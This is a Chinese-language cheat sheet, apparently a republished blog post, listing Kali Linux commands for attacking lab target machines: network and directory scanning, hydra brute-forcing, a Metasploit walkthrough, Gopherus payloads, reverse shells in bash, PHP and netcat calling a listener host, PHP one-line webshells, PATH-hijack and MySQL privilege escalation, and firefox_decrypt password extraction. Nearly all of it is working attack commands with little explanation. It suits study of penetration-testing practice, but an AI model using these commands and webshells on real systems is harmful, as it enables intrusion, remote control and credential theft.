首页 > 编程入门 文章详情

Kali中常用打靶工具及命令(随时补充)

编程入门 行业动态 更新时间:2024-10-05 23:26:48

Kali中常用打靶工具及<a href=https://www.elefans.com/category/jswz/34/1771323.html style=命令(随时补充)"/>

Kali中常用打靶工具及命令(随时补充)

一、信息收集

1. 查看同网段所有主机

arp-scan -l

2. nmap扫描

nmap -A -T4 -p- 192.168.15.134

3. 目录扫描

dirsearch -u http://192.168.15.134/

ffuf -u http://192.168.15.134/FUZZ -w /home/kali/fuzz.txt(字典) -c -ic -e  .asp,.php,.html,.txt

4. 站点扫描

wpscan -u /wordpress -e u
wpscan --api-token=获取到的免费api-token --url=http://192.168.15.135/blog -e p --plugins-detection aggressive

joomscan -u http://192.168.15.134/joomla

二、爆破

1. hydra

hydra -L user.txt(用户名字典) -P notes.txt(密码字典) ssh://192.168.15.130

三、漏洞利用

1. msf工具

msfconsole                       #启动msf
search file manager wordpress    #查找漏洞相关exp
use 1                            #使用第1个exp
show options                     #查看需要设置的参数
set RHOSTS 192.168.15.135        #设置靶机IP
set TARGETURI /blog              #设置路径
set LHOST 192.168.15.131         #设置攻击IP
run                              #启动攻击
/bin/bash -i                     #升级shell

2. gopherus工具

Gopherus工具是用来专门生成gopher协议的payload工具,通过gopher协议的以及各种被攻击应用的tcp包特点来构造payload

目前支持生成payload应用有:

  • MySQL (Port:3306)
  • FastCGI (Port:9000)
  • Memcached (Port:11211)
  • Redis (Port:6379)
  • Zabbix (Port:10050)
  • SMTP (Port:25)
#安装gopherus工具
git clone .git
#进入gopherus工具目录
cd Gopherus
#使用
./gopherus.py --exploit mysql

3. searchsploit查找插件漏洞

searchsploit 插件

payload路径

/usr/share/exploitdb/exploits/

四、反弹shell

1. 反弹shell

bash -i >&/dev/tcp/192.168.15.131/6666 0>1&

2. php反弹shell

<?php $sock=fsockopen("192.168.15.131",7777);exec("/bin/sh -i <&3 >&3 2>&3"); ?>

<?php system($_GET['shell']); ?>

3. nc反弹shell

nc -e /bin/bash 192.168.15.137 7777

4. nc开启监听

nc -lnvp 7777(端口号)

5. 升级shell交互式

python3 -c 'import pty;pty.spawn("/bin/bash")'

五、Webshell管理工具

1. 一句话木马

<?php eval($_REQUEST[password]); ?>

2. 蚁剑

#下载蚁剑

#解压蚁剑加载器压缩包
unzip AntSword-Loader-v4.0.3-linux-x64
#解压蚁剑源码压缩包
unzip antSword-master
#进入蚁剑加载器目录
cd AntSword-Loader-v4.0.3-linux-x64
#启动加载器
./AntSword

六、提权

1. 使用PATH变量

find / -perm -4000 -type f 2>/dev/null
strings 可执行文件
cd /tmp
echo "/bin/sh" > 调用命令
chmod 777 调用命令
export PATH=/tmp:$PATH
echo $PATH
/opt/statuscheck
whoami

2. Mysql提权

sudo -u root mysql -e '\! /bin/bash'

七、文件分析工具

1. strace工具检查文件运行过程

strace ./reset_root(文件名)

八、其他工具

1. MD5生成

echo -n "password" |md5sum
#生成的MD5:5f4dcc3b5aa765d61d8327deb882cf99

2. 生成SSH密钥对

ssh-keygen

3. firefox_decrypt提取工具

#下载firefox_decrypt工具
git clone .git
#进入工具目录
cd firefox_decrypt
#使用工具
python3 firefox_decrypt.py /root/.mozilla/firefox

4. 端口转发

ssh -Nf -L 9999:127.0.0.1:8080 aeolus@192.168.15.138

5. smbclient工具

smbclient -L 192.168.15.138

更多推荐

Kali中常用打靶工具及命令(随时补充)

本文发布于:2024-02-14 13:51:09,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/34/1763455.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:命令   常用   工具   Kali

发布评论

评论列表 (有 0 条评论)

最近发表

草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!

热门文章

标签列表